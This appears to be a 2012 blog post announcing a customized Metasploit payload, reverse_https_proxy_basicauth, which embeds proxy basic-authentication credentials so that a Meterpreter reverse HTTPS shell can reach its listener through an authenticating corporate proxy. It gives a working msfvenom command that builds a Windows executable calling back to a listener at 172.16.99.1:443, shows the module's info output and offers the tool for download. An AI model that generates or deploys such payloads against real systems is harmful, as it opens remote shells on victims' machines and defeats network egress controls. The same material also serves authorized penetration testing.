Metasploit stager: reverse_https with basic authentication against proxy

1. Introduction

If reverse_https does an amazing job by supporting proxy server and NTLM authentication, it exists some situations where the proxy server only manage basic authentication, and where you hold a valid pair of username and password.

Unlike NTLM, the username and password used during a basic authentication remains in the scope of the process (example: in your browser, after a successful authentication against the proxy server). This is the reason why reverse_http(s) doesn’t know anything about this password. Instead, reverse_http(s) stager use WinInet API to let Windows manages how to reach the Internet.

Back to our basic authentication mechanism, this customized version of reverse_https will let you embed a valid username and password inside the payload, to allow proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are automatically managed by WinInet.

2. Usage example

2.1. EXE generation

msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
  -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
   PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe

2.2. Module info

msf  > info payload/windows/meterpreter/reverse_https_proxy_basicauth

       Name: Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (proxy basic auth)
     Module: payload/windows/meterpreter/reverse_https_proxy_basicauth
    Version: 1, 15548, 14976
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 425
       Rank: Normal

Provided by:
  skape
  sf
  hdm

Basic options:
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
EXITFUNC         process          yes       Exit technique: seh, thread, process, none
LHOST                             yes       The local listener hostname
LPORT            8443             yes       The local listener port
PROXY_AUTH_PASS  pass123          yes       Proxy authentication (password)
PROXY_AUTH_USER  username         yes       Proxy authentication (username)

Description:
  Tunnel communication over HTTP using SSL, using hardcoded proxy auth 
  settings, Inject the meterpreter server DLL via the Reflective Dll 
  Injection payload (staged)

3. Download

Link : reverse_https_proxy_basicauth.tar.gz

Enjoy

© 2012, foip. All rights reserved.